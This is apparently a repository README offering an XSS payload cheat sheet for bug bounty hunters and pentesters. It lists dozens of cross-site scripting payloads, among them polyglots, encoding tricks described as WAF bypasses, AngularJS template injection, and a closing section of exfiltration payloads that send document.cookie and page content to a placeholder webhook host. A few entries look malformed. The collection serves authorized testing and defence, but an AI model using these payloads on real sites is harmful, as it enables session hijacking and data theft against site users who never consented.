XSS Payload Cheat Sheet (2025 Edition) 🛡️

Educational Use Only
These payloads are provided solely for authorized security testing, penetration testing, and bug bounty hunting. Always obtain explicit written permission before testing any system.

Why This Cheat Sheet?

A regularly updated, well-organized collection of modern XSS payloads that actually work in 2025 against real-world WAFs, CSPs, and filters. Perfect for bug bounty hunters, pentesters, and red teamers.

Payload Categories

1. Basic & Classic Payloads

Click to expand (15 payloads)

1. <script>alert(1)</script>
2. <img src=x onerror=alert(1)>
3. <svg onload=alert(1)>
4. <body onload=alert(1)>
5. <iframe src=javascript:alert(1)></iframe>
6. <input autofocus onfocus=alert(1)>
7. <details open ontoggle=alert(1)>
8. <marquee onstart=alert(1)>Loop</marquee>
9. <video><source onerror=alert(1)>
10. <audio src onerror=alert(1)>
11. <img src=x onerror=alert(document.domain)>
12. <svg><animate onbegin=alert(1) attributeName=x dur=1s>
13. <math><mi onclick=alert(1)>XSS</mi></math>
14. <table background="javascript:alert(1)">
15. <link rel=stylesheet href="javascript:alert(1)">

2. Polyglots (Work in Multiple Contexts)

Click to expand – extremely powerful (10 payloads)

1. javascript:alert(1)
2. jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=alert(1)//'>
3. "><script>alert(1)</script>
4. '><img src=x onerror=alert(1)>
5. </script><svg onload=alert(1)>
6. <img src=x onerror=alert(1)//
7. <details open ontoggle=alert(1)</details>
8. ';alert(1);//
9. ";alert(1);//
10. <svg><script>alert1&lt;1&gt;</script>

3. Encoding & Obfuscation Bypass

Click to expand (WAF killers)

1. <script>eval('\141\154\145\162\164(1)')</script> → octal
2. <script>eval('\x61\x6c\x65\x72\x74(1)')</script> → hex
3. <script>\u0061\u006c\u0065\u0072\u0074(1)</script> → unicode
4. <img src=x onerror=eval('\x61\x6c\x65\x72\x74(1)')>
5. <a href="javascript&#58;alert(1)">Click</a>
6. <img src=x onerror=alert(String.fromCharCode(49))>
7. <script src=data:,alert(1)></script>
8. <script>alert1</script>
9. %3Cscript%3Ealert(1)%3C/script%3E → URL encoded
10. <svg/onload=alert(1)>

4. Event-Based (No User Interaction Required)

Click to expand

1. <body onresize=alert(1)> (trigger with window.resizeTo(500,500))
2. <body onpageshow=alert(1)>
3. <body onfocus=alert(1)>
4. <body onhashchange=alert(1)> + change #
5. <details open ontoggle=alert(1)>
6. <video autoplay onplay=alert(1)>
7. <audio autoplay onplay=alert(1)>

5. Advanced & Framework-Specific

Click to expand (Angular, React, Vue, Bootstrap, etc.)

1. {{constructor.constructor('alert(1)')()}} → AngularJS
2. ${{alert(1)}} → Some template engines
3. <xss onanimationstart=alert(1) class="animate__animated">
4. <div onpointerover=alert(1)>Hover me</div>
5. <iframe srcdoc="<svg onload=alert(1)>"></iframe>

6. Blind / Exfiltration Payloads

Click to expand

1. <img src=https://your-webhook.com/?cookie= + document.cookie>
2. <script>fetch('https://your-webhook.com/'+document.cookie)</script>
3. <img src=x onerror=navigator.sendBeacon('https://your-webhook.com',document.body.innerHTML)>

How to Contribute

Found a new working payload in 2025–2026?
→ Open a Pull Request! I’ll review and merge quickly.

References & Credits

• PortSwigger Web Security Academy
• PayloadsAllTheThings by Swissky
• OWASP XSS Filter Evasion Cheat Sheet
• My own bug bounty reports (2025–2026)

---

Star ⭐ this repo if it helped you pop an alert() in a real bug bounty program!

Feel free to fork, improve, and share with the community.

Happy Hacking! 🔴🧑‍💻